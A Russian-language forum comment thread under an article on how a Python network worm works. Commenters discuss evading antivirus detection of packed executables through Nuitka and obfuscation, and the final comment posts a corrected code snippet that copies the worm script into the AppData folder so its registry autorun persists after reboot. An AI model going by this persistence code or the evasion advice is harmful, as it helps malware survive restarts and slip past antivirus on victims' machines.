Изучаем принцип работы сетевого червя на Python

[Johan Van]

Классная статья, только вот exe'шник от pyinstaller детектит каждый антивирь)

Это да, даже, если в нем нет ничего зловредного. Даже упакованный Nuitka код детектиться. Тут придется еще и обфускацию кода делать, чтобы хоть немного антивирь запутать.

 

[Exited3n]

Это да, даже, если в нем нет ничего зловредного. Даже упакованный Nuitka код детектиться. Тут придется еще и обфускацию кода делать, чтобы хоть немного антивирь запутать.

Возникла такая проблема да, от pyinstaller'a было по 50 детектов, нуиткой 10 и это при том что в коде не было ничего зловреднего. В итоге получилось собрать нуиткой без детектов.

 

[INPC]

Возникла такая проблема да, от pyinstaller'a было по 50 детектов, нуиткой 10 и это при том что в коде не было ничего зловреднего. В итоге получилось собрать нуиткой без детектов.

В статье описан только принцип работы. Код и не должен быть подготовлен для упаковки и использования. Ничего удивительного, что он детектится всем, чем можно.

 

[trippleXpro]

Хорошая статья, для новичков подойдет.
Было бы интересно почитать про обфускацию кода на питоне)
Хотя конечно писать на питоне зловреды, такое себе развлечение

 

[Gh0stx]

блок кода который создает копию и работает с ним написан неправильно,т.к в реестр добавляется такой путь: C:\Users\This\AppData\Roaming/worm/worm.py - при перезагрузки системы код не запускается. Предлагаю это решение:
dir = '%s\\worm\\' % os.environ['APPDATA']
path = dir + os.path.basename(__file__)
if not os.path.exists(dir_path):
os.makedirs(dir)
shutil.copy(__file__, path)
код будет выполняться после перезагрузки, и путь будет правильным:C:\Users\This\AppData\Roaming\worm\worm.py